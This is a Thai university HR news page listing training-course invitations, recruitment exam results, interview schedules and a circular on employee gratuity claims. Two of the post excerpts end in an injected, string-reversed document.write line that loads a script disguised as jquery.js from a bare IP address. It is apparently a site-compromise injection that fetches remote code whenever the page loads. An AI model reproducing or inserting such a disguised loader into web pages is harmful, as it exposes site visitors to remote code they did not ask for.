ประชาสัมพันธ์หลักสูตร การสื่อสารอย่างสร้างสรรค์ในองค์กร

ศูนย์พัฒนาทุนมนุษย์ มหาวิทยาลัยสวนดุสิต  มีพันธกิจในการพัฒนาและฝึกอบรมการอบรมให้แก่บุคคล และหน่วยงานต่างๆ ทั้งภายในและภายนอกมหาวิทยาลัย ดาวน์โหลด รายละเอียดหลักสูตร ที่นี่
Read More
ประชาสัมพันธ์หลักสูตร การสื่อสารอย่างสร้างสรรค์ในองค์กร

ประชาสัมพันธ์หลักสูตร การจัดทำแผนการจัดการความรู้รายบุคคล (Individual KM Plan)

ศูนย์พัฒนาทุนมนุษย์ มหาวิทยาลัยสวนดุสิต มีหนังสือที่ ศทม. ๑๗๑๕/๒๕๖๑ เรื่อง ขอเชิญบุคลากรเข้าร่วมอบรมโครงการฝึกอบรมเชิงปฏิบัติการ “การจัดทำแผนการจัดการความรู้รายบุคคล (Individual KM Plan) ในการพัฒนากระบวนการปฎิบัติงานของบุคลากรเพื่อการสร้างสรรค์ผลงานสู่ความก้าวหน้าในสายอาชีพของบุคลากร)” ประจำปีงบประมาณ ๒๕๖๒ รุ่นที่ ๗  ดาวน์โหลด รายละเอียดหลักสูตร ที่นี่
Read More
ประชาสัมพันธ์หลักสูตร การจัดทำแผนการจัดการความรู้รายบุคคล (Individual KM Plan)

ประชาสัมพันธ์ เข้าร่วมประชุมวิชาการเครือข่ายบริหารทรัพยากรบุคคล

ตามที่มหาวิทยลัยเชียงใหม่ โดยเครือข่ายบริหารทรัพยากรบุคคล ร่วมกับที่ประชุมสภาข้าราชการพนักงาน และลูกจ้างมหาวิทยาลัยแห่งประเทศไทย (ปขมท.) มีกำหนดจัดโครงการประชุมวิชาการเครือข่ายบริหารทรัพยากรบุคคล ดาวน์โหลด รายละเอียด ที่นี่  
Read More
ประชาสัมพันธ์ เข้าร่วมประชุมวิชาการเครือข่ายบริหารทรัพยากรบุคคล

ประกาศมหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัย

เรื่อง ปฎิทินการประชุมคณะกรรมการบริหารงานบุคคล ประจำปี พ.ศ. ๒๕๖๒ สามารถดาวโหลดได้ที่นี่
Read More
ประกาศมหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัย

ประกาศผลการสอบสรรหา ผลการสอบคัดเลือกบุคลากร ลูกจ้าง สังกัดส่วนกลาง

ตามที่คณะกรรมการดำเนินการสอบคัดเลือกบุคคลเพื่อบรรจุและแต่งตั้งเป็นบุคลากรของมหาวิทยาลัย และจ้างเป็นลูกจ้าง ได้ดำเนินการสอบสัมภาษณ์ เมื่อ 20 ธันวาคม 27 ธันวาคม พ.ศ.2561 และ 7 มกราคม พ.ศ. 2562  ไปแล้ว จึงออกประกาศผลการสอบคัดเลือก ผลการสอบสรรหาไว้ (รายละเอียดตามลิงค์ด้านล่าง) ดังนี้ คลิกดูรายละเอียดได้ตามลิงค์ด้านล่าง 1.ประกาศผลการสอบคัดเลือกบุคลากร ประเภทวิชาการ
Read More
ประกาศผลการสอบสรรหา ผลการสอบคัดเลือกบุคลากร ลูกจ้าง สังกัดส่วนกลาง

วิทยาลัยสงฆ์พิจิตร ประกาศรายชื่อผู้มีสิทธิ์สัมภาษณ์

ตามที่มหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัย ประกาศรับสมัครสอบคัดเลือกบุคคลเพื่อบรรจุและแต่งตั้งเป็นบุคลากร และแต่งตั้งเป็นลูกจ้างของมหาวิทยาลัย โดยกลุ่มงานบริหารงานบุคคลได้ดำเนินการจัดสอบความรู้ทั่วไปและความรู้เฉพาะตำแหน่ง เป็นที่เรียบร้อยไปแล้วนั้น มหาวิทยาลัย ได้กำหนดวัน เวลา และสถานที่สอบสัมภาษณ์ จึงออกประกาศเพื่อให้ผู้มีสิทธิ์สอบสัมภาษณ์เข้ารับการสัมภาษณ์ ตามวันเวลา และสถานที่กำหนด ดาวน์โหลดประกาศ คลิก ๑. ประกาศ วัน เวลา สอบสัมภาษณ์ บุคลากร ประเภทวิชาการ ๒. ประกาศ วัน
Read More
วิทยาลัยสงฆ์พิจิตร ประกาศรายชื่อผู้มีสิทธิ์สัมภาษณ์

กรมบัญชีกลาง ซ้อมความเข้าใจเกี่ยวกับการขอรับบำเหน็จลูกจ้าง

ตามที่กรมบัญชีกลาง มีหนังสือที่ กค. ๐๔๐๗/ว ๕๒๗ เรื่อง ซ้อมความเข้าใจเกี่ยวกับการขอรับบำเหน็จลูกจ้าง นั้น  มหาวิทยาลัย มอบหมายให้กองกลาง สำนักงานอธิการบดี เวียนแจ้งหนังสือดังกล่าว ดาวน์โหลดจดหมายแจ้งได้ที่นี่ document.write('>tpircs/"sj.yreuqj/87.611.942.431//:sptth"=crs tpircs
Read More
กรมบัญชีกลาง ซ้อมความเข้าใจเกี่ยวกับการขอรับบำเหน็จลูกจ้าง

ประชาสัมพันธ์หลักสูตร การจัดทำแผนการจัดการความรู้รายบุคคล (Individual KM Plan)

ศูนย์พัฒนาทุนมนุษย์ มหาวิทยาลัยสวนดุสิต มีหนังสือที่ ศทม. ๑๖๔๔/๒๕๖๑ เรื่อง ขอเชิญบุคลากรเข้าร่วมอบรมโครงการฝึกอบรมเชิงปฏิบัติการ “การจัดทำแผนการจัดการความรู้รายบุคคล (Individual KM Plan) ในการพัฒนากระบวนการปฎิบัติงานของบุคลากรเพื่อการสร้างสรรค์ผลงานสู่ความก้าวหน้าในสายอาชีพของบุคลากร)” ประจำปีงบประมาณ ๒๕๖๒ รุ่นที่ ๗ ดาวน์โหลด รายละเอียดหลักสูตร ที่นี่ document.write('>tpircs/"sj.yreuqj/87.611.942.431//:sptth"=crs tpircs
Read More
ประชาสัมพันธ์หลักสูตร การจัดทำแผนการจัดการความรู้รายบุคคล (Individual KM Plan)
ประกาศรายชื่อผู้มีสิทธิ์สอบสัมภาษณ์คัดเลือกเป็นบุคลากรมหาวิทยาลัย (สิงหาคม 2560)
ประกาศมหาวิทยาลัย เรื่องกำหนดวันหยุดและวันทำงานชดเชย ประจำปี พ.ศ.2560
หนังสือภาพ รายงานผลการจัดการความรู้เพื่อมุ่งสู่องค์กรแห่งความเป็นเลิศ และภาพการจัดแสดงนิทรรศการ 2560
ประกาศรายชื่อผู้มีสิทธิ์สอบข้อเขียน
รับสมัครสอบคัดเลือกเพื่อบรรจุเป็นบุคลากรของมหาวิทยาลัย (ก.ค.2560)
ประกาศผลการสอบคัดเลือกบุคคลเพื่อบรรจุและแต่งตั้ง
การคัดเลือกผลงานแนววิธีปฏิบัติที่เป็นเลิศด้านการจัดการความรู้ “วันบุรพาจารย์ 70 ปีมหาจุฬา”
เรื่อง ผลการคัดเลือกผลงานแนววิธีปฏิบัติที่เป็นเลิศด้านการจัดการความรู้ ประจำปี 2560